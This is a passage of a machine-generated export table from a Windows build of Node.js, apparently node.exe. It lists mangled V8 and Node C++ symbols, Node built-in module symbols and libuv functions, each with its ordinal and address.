?New@FunctionTemplate@v8@@SA?AV?$Local@VFunctionTemplate@v8@@@2@P6A?AV?$Handle@VValue@v8@@@2@AEBVArguments@2@@ZV42@V?$Handle@VSignature@v8@@@2@@Z	456	0x140160d20
?New@Integer@v8@@SA?AV?$Local@VInteger@v8@@@2@H@Z	457	0x140177c00
?New@Integer@v8@@SA?AV?$Local@VInteger@v8@@@2@HPEAVIsolate@2@@Z	458	0x140177cc0
?New@Isolate@v8@@SAPEAV12@XZ	459	0x1401792a0
?New@Number@v8@@SA?AV?$Local@VNumber@v8@@@2@N@Z	460	0x140177b40
?New@NumberObject@v8@@SA?AV?$Local@VValue@v8@@@2@N@Z	461	0x140176600
?New@Object@v8@@SA?AV?$Local@VObject@v8@@@2@XZ	462	0x1401764e0
?New@ObjectTemplate@v8@@CA?AV?$Local@VObjectTemplate@v8@@@2@V?$Handle@VFunctionTemplate@v8@@@2@@Z	463	0x140162720
?New@ObjectTemplate@v8@@SA?AV?$Local@VObjectTemplate@v8@@@2@XZ	464	0x140162700
?New@RegExp@v8@@SA?AV?$Local@VRegExp@v8@@@2@V?$Handle@VString@v8@@@2@W4Flags@12@@Z	465	0x140177170
?New@Script@v8@@SA?AV?$Local@VScript@v8@@@2@V?$Handle@VString@v8@@@2@PEAVScriptOrigin@2@PEAVScriptData@2@0@Z	466	0x140163a30
?New@Script@v8@@SA?AV?$Local@VScript@v8@@@2@V?$Handle@VString@v8@@@2@V?$Handle@VValue@v8@@@2@@Z	467	0x140163da0
?New@ScriptData@v8@@SAPEAV12@PEBDH@Z	468	0x1401638f0
?New@Signature@v8@@SA?AV?$Local@VSignature@v8@@@2@V?$Handle@VFunctionTemplate@v8@@@2@HQEAV42@@Z	469	0x140160ee0
?New@String@v8@@SA?AV?$Local@VString@v8@@@2@PEBDH@Z	470	0x140175830
?New@String@v8@@SA?AV?$Local@VString@v8@@@2@PEBGH@Z	471	0x140175b90
?New@StringObject@v8@@SA?AV?$Local@VValue@v8@@@2@V?$Handle@VString@v8@@@2@@Z	472	0x140176a20
?New@TypeSwitch@v8@@SA?AV?$Local@VTypeSwitch@v8@@@2@HQEAV?$Handle@VFunctionTemplate@v8@@@2@@Z	473	0x1401610d0
?New@TypeSwitch@v8@@SA?AV?$Local@VTypeSwitch@v8@@@2@V?$Handle@VFunctionTemplate@v8@@@2@@Z	474	0x1401610a0
?NewExternal@String@v8@@SA?AV?$Local@VString@v8@@@2@PEAVExternalAsciiStringResource@12@@Z	475	0x1401760e0
?NewExternal@String@v8@@SA?AV?$Local@VString@v8@@@2@PEAVExternalStringResource@12@@Z	476	0x140175de0
?NewFromUnsigned@Integer@v8@@SA?AV?$Local@VInteger@v8@@@2@I@Z	477	0x140177c60
?NewFromUnsigned@Integer@v8@@SA?AV?$Local@VInteger@v8@@@2@IPEAVIsolate@2@@Z	478	0x140177d90
?NewInstance@Function@v8@@QEBA?AV?$Local@VObject@v8@@@2@HQEAV?$Handle@VValue@v8@@@2@@Z	479	0x140170f60
?NewInstance@Function@v8@@QEBA?AV?$Local@VObject@v8@@@2@XZ	480	0x140170f40
?NewInstance@ObjectTemplate@v8@@QEAA?AV?$Local@VObject@v8@@@2@XZ	481	0x140174e90
?NewSymbol@String@v8@@SA?AV?$Local@VString@v8@@@2@PEBDH@Z	482	0x140177a30
?NewUndetectable@String@v8@@SA?AV?$Local@VString@v8@@@2@PEBDH@Z	483	0x140175a80
?NewUndetectable@String@v8@@SA?AV?$Local@VString@v8@@@2@PEBGH@Z	484	0x140175cc0
?Null@v8@@YA?AV?$Handle@VPrimitive@v8@@@1@XZ	485	0x140052b60
?NumberOfHandles@HandleScope@v8@@SAHXZ	486	0x14015fde0
?NumberValue@Date@v8@@QEBANXZ	487	0x140176d90
?NumberValue@NumberObject@v8@@QEBANXZ	488	0x1401766f0
?NumberValue@Value@v8@@QEBANXZ	489	0x14016a150
?ObjectProtoToString@Object@v8@@QEAA?AV?$Local@VString@v8@@@2@XZ	490	0x14016cfd0
?PauseProfiler@V8@v8@@SAXXZ	491	0x140179030
?PreCompile@ScriptData@v8@@SAPEAV12@PEBDH@Z	492	0x140163700
?PreCompile@ScriptData@v8@@SAPEAV12@V?$Handle@VString@v8@@@2@@Z	493	0x1401637a0
?PrepareStressRun@Testing@v8@@SAXH@Z	494	0x14017d580
?PrintCurrentStackTrace@Message@v8@@SAXPEAU_iobuf@@@Z	495	0x140166550
?ProcessDebugMessages@Debug@v8@@SAXXZ	496	0x140011f70
?PrototypeTemplate@FunctionTemplate@v8@@QEAA?AV?$Local@VObjectTemplate@v8@@@2@XZ	497	0x140160a30
?PushHeapObjectsStats@HeapProfiler@v8@@SAIPEAVOutputStream@2@@Z	498	0x14017d390
?RangeError@Exception@v8@@SA?AV?$Local@VValue@v8@@@2@V?$Handle@VString@v8@@@2@@Z	499	0x1401799b0
?RawClose@HandleScope@v8@@AEAAPEAPEAVObject@internal@2@PEAPEAV342@@Z	500	0x140160330
?ReThrow@TryCatch@v8@@QEAA?AV?$Handle@VValue@v8@@@2@XZ	501	0x140164b80
?ReadDoubleBE@Buffer@node@@CA?AV?$Handle@VValue@v8@@@v8@@AEBVArguments@4@@Z	502	0x1400148e0
?ReadDoubleLE@Buffer@node@@CA?AV?$Handle@VValue@v8@@@v8@@AEBVArguments@4@@Z	503	0x1400148c0
?ReadFloatBE@Buffer@node@@CA?AV?$Handle@VValue@v8@@@v8@@AEBVArguments@4@@Z	504	0x1400148a0
?ReadFloatLE@Buffer@node@@CA?AV?$Handle@VValue@v8@@@v8@@AEBVArguments@4@@Z	505	0x140014880
?ReadOnlyPrototype@FunctionTemplate@v8@@QEAAXXZ	506	0x140161db0
?ReattachGlobal@Context@v8@@QEAAXV?$Handle@VObject@v8@@@2@@Z	507	0x140174a70
?Ref@ObjectWrap@node@@MEAAXXZ	508	0x140001b60
?ReferenceError@Exception@v8@@SA?AV?$Local@VValue@v8@@@2@V?$Handle@VString@v8@@@2@@Z	509	0x140179bc0
?RegisterExtension@v8@@YAXPEAVExtension@1@@Z	510	0x14015f470
?RemoveCallCompletedCallback@V8@v8@@SAXP6AXXZ@Z	511	0x140178f60
?RemoveGCEpilogueCallback@V8@v8@@SAXP6AXW4GCType@2@W4GCCallbackFlags@2@@Z@Z	512	0x140178c60
?RemoveGCPrologueCallback@V8@v8@@SAXP6AXW4GCType@2@W4GCCallbackFlags@2@@Z@Z	513	0x140178af0
?RemoveMemoryAllocationCallback@V8@v8@@SAXP6AXW4ObjectSpace@2@W4AllocationAction@2@H@Z@Z	514	0x140178df0
?RemoveMessageListeners@V8@v8@@SAXP6AXV?$Handle@VMessage@v8@@@2@V?$Handle@VValue@v8@@@2@@Z@Z	515	0x140178050
?Replace@Buffer@node@@AEAAXPEAD_KP6AX0PEAX@Z2@Z	516	0x140013a80
?Reset@TryCatch@v8@@QEAAXXZ	517	0x140164f50
?ResumeProfiler@V8@v8@@SAXXZ	518	0x140179050
?Run@Script@v8@@QEAA?AV?$Local@VValue@v8@@@2@XZ	519	0x140164060
?SendCommand@Debug@v8@@SAXPEBGHPEAVClientData@12@PEAVIsolate@2@@Z	520	0x14017ac00
?Serialize@HeapSnapshot@v8@@QEBAXPEAVOutputStream@2@W4SerializationFormat@12@@Z	521	0x14017cd50
?Set@Object@v8@@QEAA_NIV?$Handle@VValue@v8@@@2@@Z	522	0x14016b7c0
?Set@Object@v8@@QEAA_NV?$Handle@VValue@v8@@@2@0W4PropertyAttribute@2@@Z	523	0x14016b540
?Set@Template@v8@@QEAAXPEBDV?$Handle@VData@v8@@@2@@Z	524	0x1400018d0
?Set@Template@v8@@QEAAXV?$Handle@VString@v8@@@2@V?$Handle@VData@v8@@@2@W4PropertyAttribute@2@@Z	525	0x140160760
?SetAbortOnUncaughtException@Isolate@v8@@QEAAXP6A_NXZ@Z	526	0x140179350
?SetAccessCheckCallbacks@ObjectTemplate@v8@@QEAAXP6A_NV?$Local@VObject@v8@@@2@V?$Local@VValue@v8@@@2@W4AccessType@2@1@ZP6A_N0I21@ZV?$Handle@VValue@v8@@@2@_N@Z	527	0x140162eb0
?SetAccessor@Object@v8@@QEAA_NV?$Handle@VString@v8@@@2@P6A?AV?$Handle@VValue@v8@@@2@V?$Local@VString@v8@@@2@AEBVAccessorInfo@2@@ZP6AX1V?$Local@VValue@v8@@@2@2@ZV42@W4AccessControl@2@W4PropertyAttribute@2@@Z	528	0x14016dbb0
?SetAccessor@ObjectTemplate@v8@@QEAAXV?$Handle@VString@v8@@@2@P6A?AV?$Handle@VValue@v8@@@2@V?$Local@VString@v8@@@2@AEBVAccessorInfo@2@@ZP6AX1V?$Local@VValue@v8@@@2@2@ZV42@W4AccessControl@2@W4PropertyAttribute@2@V?$Handle@VAccessorSignature@v8@@@2@@Z	529	0x140162960
?SetAddHistogramSampleFunction@V8@v8@@SAXP6AXPEAXH@Z@Z	530	0x140178560
?SetAllowCodeGenerationFromStringsCallback@V8@v8@@SAXP6A_NV?$Local@VContext@v8@@@2@@Z@Z	531	0x14015f2a0
?SetCallAsFunctionHandler@ObjectTemplate@v8@@QEAAXP6A?AV?$Handle@VValue@v8@@@2@AEBVArguments@2@@ZV32@@Z	532	0x140163340
?SetCallHandler@FunctionTemplate@v8@@QEAAXP6A?AV?$Handle@VValue@v8@@@2@AEBVArguments@2@@ZV32@@Z	533	0x140161370
?SetCaptureMessage@TryCatch@v8@@QEAAX_N@Z	534	0x140164f80
?SetCaptureStackTraceForUncaughtExceptions@V8@v8@@SAX_NHW4StackTraceOptions@StackTrace@2@@Z	535	0x1401782c0
?SetClassName@FunctionTemplate@v8@@QEAAXV?$Handle@VString@v8@@@2@@Z	536	0x140161b80
?SetCounterFunction@V8@v8@@SAXP6APEAHPEBD@Z@Z	537	0x140178310
?SetCreateHistogramFunction@V8@v8@@SAXP6APEAXPEBDHH_K@Z@Z	538	0x1401783d0
?SetData@Context@v8@@QEAAXV?$Handle@VValue@v8@@@2@@Z	539	0x140160120
?SetData@Isolate@v8@@QEAAXPEAX@Z	540	0x1400019a0
?SetData@Script@v8@@QEAAXV?$Handle@VString@v8@@@2@@Z	541	0x140164810
?SetDebugEventListener2@Debug@v8@@SA_NP6AXAEBVEventDetails@12@@ZV?$Handle@VValue@v8@@@2@@Z	542	0x14017a640
?SetDebugEventListener@Debug@v8@@SA_NP6AXW4DebugEvent@2@V?$Handle@VObject@v8@@@2@1V?$Handle@VValue@v8@@@2@@Z2@Z	543	0x14017a4a0
?SetDebugEventListener@Debug@v8@@SA_NV?$Handle@VObject@v8@@@2@V?$Handle@VValue@v8@@@2@@Z	544	0x14017a7e0
?SetDebugMessageDispatchHandler@Debug@v8@@SAXP6AXXZ_N@Z	545	0x14017ad40
?SetDecompressedStartupData@V8@v8@@SAXPEAVStartupData@2@@Z	546	0x140368010
?SetEntropySource@V8@v8@@SAXP6A_NPEAE_K@Z@Z	547	0x1401739f0
?SetErrno@node@@YAXUuv_err_s@@@Z	548	0x14000bc50
?SetErrorMessageForCodeGenerationFromStrings@Context@v8@@QEAAXV?$Handle@VString@v8@@@2@@Z	549	0x140174d60
?SetFailedAccessCheckCallbackFunction@V8@v8@@SAXP6AXV?$Local@VObject@v8@@@2@W4AccessType@2@V?$Local@VValue@v8@@@2@@Z@Z	550	0x140178710
?SetFatalErrorHandler@V8@v8@@SAXP6AXPEBD0@Z@Z	551	0x14015f240
?SetFlagsFromCommandLine@V8@v8@@SAXPEAHPEAPEAD_N@Z	552	0x14015f310
?SetFlagsFromString@V8@v8@@SAXPEBDH@Z	553	0x14015f300
?SetFunctionEntryHook@V8@v8@@SA_NP6AX_K0@Z@Z	554	0x140173a10
?SetGlobalGCEpilogueCallback@V8@v8@@SAXP6AXXZ@Z	555	0x1401789e0
?SetGlobalGCPrologueCallback@V8@v8@@SAXP6AXXZ@Z	556	0x140178960
?SetHiddenPrototype@FunctionTemplate@v8@@QEAAX_N@Z	557	0x140161cb0
?SetHiddenValue@Object@v8@@QEAA_NV?$Handle@VString@v8@@@2@V?$Handle@VValue@v8@@@2@@Z	558	0x14016f170
?SetHostDispatchHandler@Debug@v8@@SAXP6AXXZH@Z	559	0x14017ac90
?SetIndexedInstancePropertyHandler@FunctionTemplate@v8@@AEAAXP6A?AV?$Handle@VValue@v8@@@2@IAEBVAccessorInfo@2@@ZP6A?AV32@IV?$Local@VValue@v8@@@2@0@ZP6A?AV?$Handle@VInteger@v8@@@2@I0@ZP6A?AV?$Handle@VBoolean@v8@@@2@I0@ZP6A?AV?$Handle@VArray@v8@@@2@0@ZV32@@Z	560	0x1401621c0
?SetIndexedPropertiesToExternalArrayData@Object@v8@@QEAAXPEAXW4ExternalArrayType@2@H@Z	561	0x14016fdf0
?SetIndexedPropertiesToPixelData@Object@v8@@QEAAXPEAEH@Z	562	0x14016f910
?SetIndexedPropertyHandler@ObjectTemplate@v8@@QEAAXP6A?AV?$Handle@VValue@v8@@@2@IAEBVAccessorInfo@2@@ZP6A?AV32@IV?$Local@VValue@v8@@@2@0@ZP6A?AV?$Handle@VInteger@v8@@@2@I0@ZP6A?AV?$Handle@VBoolean@v8@@@2@I0@ZP6A?AV?$Handle@VArray@v8@@@2@0@ZV32@@Z	563	0x140163160
?SetInstanceCallAsFunctionHandler@FunctionTemplate@v8@@AEAAXP6A?AV?$Handle@VValue@v8@@@2@AEBVArguments@2@@ZV32@@Z	564	0x1401624f0
?SetInternalField@Object@v8@@QEAAXHV?$Handle@VValue@v8@@@2@@Z	565	0x1401736c0
?SetInternalFieldCount@ObjectTemplate@v8@@QEAAXH@Z	566	0x140163590
?SetJitCodeEventHandler@V8@v8@@SAXW4JitCodeEventOptions@2@P6AXPEBUJitCodeEvent@2@@Z@Z	567	0x140173a30
?SetLiveEditEnabled@Debug@v8@@SAX_NPEAVIsolate@2@@Z	568	0x14017b370
?SetMessageHandler2@Debug@v8@@SAXP6AXAEBVMessage@12@@Z@Z	569	0x14017ab60
?SetMessageHandler@Debug@v8@@SAXP6AXPEBGHPEAVClientData@12@@Z_N@Z	570	0x14017aa70
?SetName@Function@v8@@QEAAXV?$Handle@VString@v8@@@2@@Z	571	0x140171670
?SetNamedInstancePropertyHandler@FunctionTemplate@v8@@AEAAXP6A?AV?$Handle@VValue@v8@@@2@V?$Local@VString@v8@@@2@AEBVAccessorInfo@2@@ZP6A?AV32@0V?$Local@VValue@v8@@@2@1@ZP6A?AV?$Handle@VInteger@v8@@@2@01@ZP6A?AV?$Handle@VBoolean@v8@@@2@01@ZP6A?AV?$Handle@VArray@v8@@@2@1@ZV32@@Z	572	0x140161e90
?SetNamedPropertyHandler@ObjectTemplate@v8@@QEAAXP6A?AV?$Handle@VValue@v8@@@2@V?$Local@VString@v8@@@2@AEBVAccessorInfo@2@@ZP6A?AV32@0V?$Local@VValue@v8@@@2@1@ZP6A?AV?$Handle@VInteger@v8@@@2@01@ZP6A?AV?$Handle@VBoolean@v8@@@2@01@ZP6A?AV?$Handle@VArray@v8@@@2@1@ZV32@@Z	573	0x140162b40
?SetPointerInInternalField@Object@v8@@QEAAXHPEAX@Z	574	0x140173870
?SetPrototype@Object@v8@@QEAA_NV?$Handle@VValue@v8@@@2@@Z	575	0x14016c6c0
?SetResourceConstraints@v8@@YA_NPEAVResourceConstraints@1@@Z	576	0x14015f6a0
?SetReturnAddressLocationResolver@V8@v8@@SAXP6A_K_K@Z@Z	577	0x140173a00
?SetSecurityToken@Context@v8@@QEAAXV?$Handle@VValue@v8@@@2@@Z	578	0x1401742f0
?SetStressRunType@Testing@v8@@SAXW4StressType@12@@Z	579	0x14017d550
?SetVerbose@TryCatch@v8@@QEAAX_N@Z	580	0x140164f70
?SetWrapperClassId@?$Persistent@VFunctionTemplate@v8@@@v8@@QEAAXG@Z	581	0x140002ca0
?SetWrapperClassId@?$Persistent@VObject@v8@@@v8@@QEAAXG@Z	582	0x140002ca0
?SetWrapperClassId@V8@v8@@CAXPEAPEAVObject@internal@2@G@Z	583	0x140174e70
?SlowGetPointerFromInternalField@Object@v8@@AEAAPEAXH@Z	584	0x140175480
?StackTrace@TryCatch@v8@@QEBA?AV?$Local@VValue@v8@@@2@XZ	585	0x140164ca0
?Start@node@@YAHHQEAPEAD@Z	586	0x140012f50
?StartHeapObjectsTracking@HeapProfiler@v8@@SAXXZ	587	0x14017d270
?StartPreemption@Locker@v8@@SAXH@Z	588	0x14015cf50
?StartProfiling@CpuProfiler@v8@@SAXV?$Handle@VString@v8@@@2@@Z	589	0x14017bf30
?StopHeapObjectsTracking@HeapProfiler@v8@@SAXXZ	590	0x14017d2f0
?StopPreemption@Locker@v8@@SAXXZ	591	0x14015cf60
?StopProfiling@CpuProfiler@v8@@SAPEBVCpuProfile@2@V?$Handle@VString@v8@@@2@V?$Handle@VValue@v8@@@2@@Z	592	0x14017c020
?StrictEquals@Value@v8@@QEBA_NV?$Handle@VValue@v8@@@2@@Z	593	0x14016afd0
?StringValue@StringObject@v8@@QEBA?AV?$Local@VString@v8@@@2@XZ	594	0x140176b10
?SyntaxError@Exception@v8@@SA?AV?$Local@VValue@v8@@@2@V?$Handle@VString@v8@@@2@@Z	595	0x140179dd0
?TakeSnapshot@HeapProfiler@v8@@SAPEBVHeapSnapshot@2@V?$Handle@VString@v8@@@2@W4Type@32@PEAVActivityControl@2@@Z	596	0x14017d190
?TerminateExecution@V8@v8@@SAXH@Z	597	0x1401790e0
?TerminateExecution@V8@v8@@SAXPEAVIsolate@2@@Z	598	0x140179220
?This@AccessorInfo@v8@@QEBA?AV?$Local@VObject@v8@@@2@XZ	599	0x140001980
?ThrowException@v8@@YA?AV?$Handle@VValue@v8@@@1@V21@@Z	600	0x14015f320
?ToArrayIndex@Value@v8@@QEBA?AV?$Local@VUint32@v8@@@2@XZ	601	0x14016a8c0
?ToBoolean@Value@v8@@QEBA?AV?$Local@VBoolean@v8@@@2@XZ	602	0x140168dc0
?ToDetailString@Value@v8@@QEBA?AV?$Local@VString@v8@@@2@XZ	603	0x140168a20
?ToInt32@Value@v8@@QEBA?AV?$Local@VInt32@v8@@@2@XZ	604	0x14016a540
?ToInteger@Value@v8@@QEBA?AV?$Local@VInteger@v8@@@2@XZ	605	0x140169130
?ToNumber@Value@v8@@QEBA?AV?$Local@VNumber@v8@@@2@XZ	606	0x140168f50
?ToObject@Value@v8@@QEBA?AV?$Local@VObject@v8@@@2@XZ	607	0x140168bf0
?ToString@Value@v8@@QEBA?AV?$Local@VString@v8@@@2@XZ	608	0x140168850
?ToUint32@Value@v8@@QEBA?AV?$Local@VUint32@v8@@@2@XZ	609	0x14016a700
?True@v8@@YA?AV?$Handle@VBoolean@v8@@@1@XZ	610	0x14015f5d0
?TurnOnAccessCheck@Object@v8@@QEAAXXZ	611	0x14016e9e0
?TypeError@Exception@v8@@SA?AV?$Local@VValue@v8@@@2@V?$Handle@VString@v8@@@2@@Z	612	0x140179fe0
?UVException@node@@YA?AV?$Local@VValue@v8@@@v8@@HPEBD00@Z	613	0x14000a600
?Ucs2Slice@Buffer@node@@CA?AV?$Handle@VValue@v8@@@v8@@AEBVArguments@4@@Z	614	0x140013d10
?Ucs2Write@Buffer@node@@CA?AV?$Handle@VValue@v8@@@v8@@AEBVArguments@4@@Z	615	0x140014820
?Uint32Value@Value@v8@@QEBAIXZ	616	0x14016b320
?Undefined@v8@@YA?AV?$Handle@VPrimitive@v8@@@1@XZ	617	0x14015f570
?Unref@ObjectWrap@node@@MEAAXXZ	618	0x140001ba0
?UseDefaultSecurityToken@Context@v8@@QEAAXXZ	619	0x140174420
?Utf8Length@String@v8@@QEBAHXZ	620	0x140171d90
?Utf8Slice@Buffer@node@@CA?AV?$Handle@VValue@v8@@@v8@@AEBVArguments@4@@Z	621	0x140013cf0
?Utf8Write@Buffer@node@@CA?AV?$Handle@VValue@v8@@@v8@@AEBVArguments@4@@Z	622	0x140014800
?Value@Boolean@v8@@QEBA_NXZ	623	0x1401730e0
?Value@External@v8@@QEBAPEAXXZ	624	0x1401756f0
?Value@Int32@v8@@QEBAHXZ	625	0x140173290
?Value@Integer@v8@@QEBA_JXZ	626	0x1401731b0
?Value@Number@v8@@QEBANXZ	627	0x140173020
?Value@Uint32@v8@@QEBAIXZ	628	0x140173370
?VerifyExternalStringResource@String@v8@@AEBAXPEAVExternalStringResource@12@@Z	629	0x140172dd0
?VerifyExternalStringResourceBase@String@v8@@AEBAXPEAVExternalStringResourceBase@12@W4Encoding@12@@Z	630	0x140172e70
?VisitExternalResources@V8@v8@@SAXPEAVExternalResourceVisitor@2@@Z	631	0x140173bf0
?VisitExternalString@ExternalResourceVisitor@v8@@UEAAXV?$Handle@VString@v8@@@2@@Z	632	0x140368010
?VisitHandlesWithClassIds@V8@v8@@SAXPEAVPersistentHandleVisitor@2@@Z	633	0x140173cc0
?VisitPersistentHandle@PersistentHandleVisitor@v8@@UEAAXV?$Persistent@VValue@v8@@@2@G@Z	634	0x140368010
?WeakCallback@ObjectWrap@node@@CAXV?$Persistent@VValue@v8@@@v8@@PEAX@Z	635	0x140001c30
?WinapiErrnoException@node@@YA?AV?$Local@VValue@v8@@@v8@@HPEBD00@Z	636	0x14000aae0
?Wrap@External@v8@@SA?AV?$Local@VValue@v8@@@2@PEAX@Z	637	0x140175340
?Wrap@ObjectWrap@node@@IEAAXV?$Handle@VObject@v8@@@v8@@@Z	638	0x140001a60
?WrapperClassId@?$Persistent@VFunctionTemplate@v8@@@v8@@QEBAGXZ	639	0x140002d10
?WrapperClassId@?$Persistent@VObject@v8@@@v8@@QEBAGXZ	640	0x140002d10
?Write@String@v8@@QEBAHPEAGHHH@Z	641	0x140172a60
?WriteAscii@String@v8@@QEBAHPEADHHH@Z	642	0x140172780
?WriteDoubleBE@Buffer@node@@CA?AV?$Handle@VValue@v8@@@v8@@AEBVArguments@4@@Z	643	0x140014960
?WriteDoubleLE@Buffer@node@@CA?AV?$Handle@VValue@v8@@@v8@@AEBVArguments@4@@Z	644	0x140014940
?WriteFloatBE@Buffer@node@@CA?AV?$Handle@VValue@v8@@@v8@@AEBVArguments@4@@Z	645	0x140014920
?WriteFloatLE@Buffer@node@@CA?AV?$Handle@VValue@v8@@@v8@@AEBVArguments@4@@Z	646	0x140014900
?WriteHeapStatsChunk@OutputStream@v8@@UEAA?AW4WriteResult@12@PEAUHeapStatsUpdate@2@H@Z	647	0x140374d60
?WriteUtf8@String@v8@@QEBAHPEADHPEAHH@Z	648	0x140172180
?active_@Locker@v8@@0_NA	649	0x1405ed31a
?auto_enable@Extension@v8@@QEAA_NXZ	650	0x1400012d0
?constructor_template@Buffer@node@@2V?$Persistent@VFunctionTemplate@v8@@@v8@@A	651	0x1405efc48
?data@ExternalAsciiStringResourceImpl@v8@@UEBAPEBDXZ	652	0x140001400
?dependencies@Extension@v8@@QEAAPEAPEBDXZ	653	0x14021f030
?dependency_count@Extension@v8@@QEAAHXZ	654	0x1400012b0
?heap_size_limit@HeapStatistics@v8@@QEAA_KXZ	655	0x140001410
?kLineOffsetNotFound@Function@v8@@2HB	656	0x14042be50
?kMaxLength@Buffer@node@@2IB	657	0x1403dc8d4
?kNoColumnInfo@Message@v8@@2HB	658	0x1403db9bc
?kNoLineNumberInfo@CpuProfileNode@v8@@2HB	659	0x1403db9bc
?kNoLineNumberInfo@Message@v8@@2HB	660	0x1403db9bc
?kPersistentHandleNoClassId@HeapProfiler@v8@@2GB	661	0x140552d88
?kUnknownObjectId@HeapProfiler@v8@@2IB	662	0x1403db9bc
?length@AsciiValue@String@v8@@QEBAHXZ	663	0x140187520
?length@ExternalAsciiStringResourceImpl@v8@@UEBA_KXZ	664	0x1402900a0
?length@Utf8Value@String@v8@@QEBAHXZ	665	0x140187520
?length@Value@String@v8@@QEBAHXZ	666	0x140187520
?match@TypeSwitch@v8@@QEAAHV?$Handle@VValue@v8@@@2@@Z	667	0x140161220
?max_executable_size@ResourceConstraints@v8@@QEAAHXZ	668	0x140187520
?max_old_space_size@ResourceConstraints@v8@@QEBAHXZ	669	0x1400013e0
?max_young_space_size@ResourceConstraints@v8@@QEBAHXZ	670	0x14009b9e0
?name@Extension@v8@@QEBAPEBDXZ	671	0x140001400
?no_deprecation@node@@3_NA	672	0x1405ecff3
?set_auto_enable@Extension@v8@@QEAAX_N@Z	673	0x1400012c0
?set_heap_size_limit@HeapStatistics@v8@@AEAAX_K@Z	674	0x140001440
?set_max_executable_size@ResourceConstraints@v8@@QEAAXH@Z	675	0x140265580
?set_max_old_space_size@ResourceConstraints@v8@@QEAAXH@Z	676	0x1400013f0
?set_max_young_space_size@ResourceConstraints@v8@@QEAAXH@Z	677	0x1400013d0
?set_stack_limit@ResourceConstraints@v8@@QEAAXPEAI@Z	678	0x140001430
?set_total_heap_size@HeapStatistics@v8@@AEAAX_K@Z	679	0x140001420
?set_total_heap_size_executable@HeapStatistics@v8@@AEAAX_K@Z	680	0x1400019a0
?set_used_heap_size@HeapStatistics@v8@@AEAAX_K@Z	681	0x140001430
?source@Extension@v8@@QEBAPEBVExternalAsciiStringResource@String@2@XZ	682	0x1400012a0
?source_length@Extension@v8@@QEBA_KXZ	683	0x1402900a0
?stack_limit@ResourceConstraints@v8@@QEBAPEAIXZ	684	0x1402900a0
?total_heap_size@HeapStatistics@v8@@QEAA_KXZ	685	0x140002bf0
?total_heap_size_executable@HeapStatistics@v8@@QEAA_KXZ	686	0x140001400
?used_heap_size@HeapStatistics@v8@@QEAA_KXZ	687	0x1402900a0
node_buffer_module	688	0x1405e8a78
node_cares_wrap_module	689	0x1405e8b50
node_crypto_module	690	0x1405e7408
node_evals_module	691	0x1405e89d8
node_fs_event_wrap_module	692	0x1405e8b78
node_fs_module	693	0x1405e8a50
node_http_parser_module	694	0x1405e8a28
node_os_module	695	0x1405e8a00
node_pipe_wrap_module	696	0x1405e8988
node_process_wrap_module	697	0x1405e83c8
node_signal_wrap_module	698	0x1405e8960
node_tcp_wrap_module	699	0x1405e8938
node_timer_wrap_module	700	0x1405e8910
node_tty_wrap_module	701	0x1405e88e8
node_udp_wrap_module	702	0x1405e7478
node_zlib_module	703	0x1405e89b0
uv_accept	704	0x140151f70
uv_async_init	705	0x14014b5e0
uv_async_send	706	0x14014b680
uv_backend_fd	707	0x1402a6540
uv_backend_timeout	708	0x14028a7c0
uv_barrier_destroy	709	0x14015b5c0
uv_barrier_init	710	0x14015b520
uv_barrier_wait	711	0x14015b600
uv_buf_init	712	0x140141290
uv_cancel	713	0x1402a6540
uv_chdir	714	0x140146060
uv_check_init	715	0x140147530
uv_check_start	716	0x140147560
uv_check_stop	717	0x140147640
uv_close	718	0x140142fd0
uv_cond_broadcast	719	0x14015b310
uv_cond_destroy	720	0x14015b250
uv_cond_init	721	0x14015b200
uv_cond_signal	722	0x14015b2a0
uv_cond_timedwait	723	0x14015b4a0
uv_cond_wait	724	0x14015b460
uv_cpu_info	725	0x140146a90
uv_cwd	726	0x140145f40
uv_default_loop	727	0x140140c40
uv_disable_stdio_inheritance	728	0x14014cf10
uv_dlclose	729	0x140147990
uv_dlerror	730	0x140147a10
uv_dlopen	731	0x1401478f0
uv_dlsym	732	0x1401479d0
uv_err_name	733	0x1401412a0
uv_exepath	734	0x140145e50
uv_free_cpu_info	735	0x140146f10
uv_free_interface_addresses	736	0x140147340
uv_freeaddrinfo	737	0x140145b50
uv_fs_chmod	738	0x1401512a0
uv_fs_chown	739	0x140150800
uv_fs_close	740	0x14014fc40
uv_fs_event_init	741	0x1401425c0
uv_fs_fchmod	742	0x1401513f0
uv_fs_fchown	743	0x140150910
uv_fs_fdatasync	744	0x140150f70
uv_fs_fstat	745	0x140150c50
uv_fs_fsync	746	0x140150e70
uv_fs_ftruncate	747	0x140151070
uv_fs_futime	748	0x140151630
uv_fs_link	749	0x140150480
uv_fs_lstat	750	0x140150b20
uv_fs_mkdir	751	0x1401500b0
uv_fs_open	752	0x14014fb10
uv_fs_poll_init	753	0x140151840
uv_fs_poll_start	754	0x140151870
uv_fs_poll_stop	755	0x140151a10
uv_fs_read	756	0x14014fd40
uv_fs_readdir	757	0x140150350
uv_fs_readlink	758	0x1401506d0
uv_fs_rename	759	0x140150d50
uv_fs_req_cleanup	760	0x1401517e0
uv_fs_rmdir	761	0x140150200
uv_fs_sendfile	762	0x140151180
uv_fs_stat	763	0x1401509f0
uv_fs_symlink	764	0x1401505a0
uv_fs_unlink	765	0x14014ff80
uv_fs_utime	766	0x140151500
uv_fs_write	767	0x14014fe60
uv_get_free_memory	768	0x140146240
uv_get_process_title	769	0x140146620
uv_get_total_memory	770	0x140146290
uv_getaddrinfo	771	0x140145b70
uv_guess_handle	772	0x140142f20
uv_handle_size	773	0x140141100
uv_hrtime	774	0x140146700
uv_idle_init	775	0x140147710
uv_idle_start	776	0x140147740
uv_idle_stop	777	0x140147820
uv_inet_ntop	778	0x140144f90
uv_inet_pton	779	0x140145350
uv_interface_addresses	780	0x140146f60
uv_ip4_addr	781	0x140141a40
uv_ip4_name	782	0x140141ae0
uv_ip6_addr	783	0x140141a90
uv_ip6_name	784	0x140141b00
uv_is_active	785	0x140142fb0
uv_is_closing	786	0x140143280
uv_is_readable	787	0x140152440
uv_is_writable	788	0x140152450
uv_kill	789	0x14014ce70
uv_last_error	790	0x140001400
uv_listen	791	0x140151f20
uv_loadavg	792	0x140146230
uv_loop_configure	793	0x140142220
uv_loop_delete	794	0x140140cd0
uv_loop_new	795	0x140140c70
uv_mutex_destroy	796	0x14015ae40
uv_mutex_init	797	0x14015ae20
uv_mutex_lock	798	0x14015ae50
uv_mutex_trylock	799	0x14015ae60
uv_mutex_unlock	800	0x14015ae80
uv_now	801	0x140142210
uv_once	802	0x14015adc0
uv_pipe_bind	803	0x140152e60
uv_pipe_connect	804	0x140153240
uv_pipe_init	805	0x1401524e0
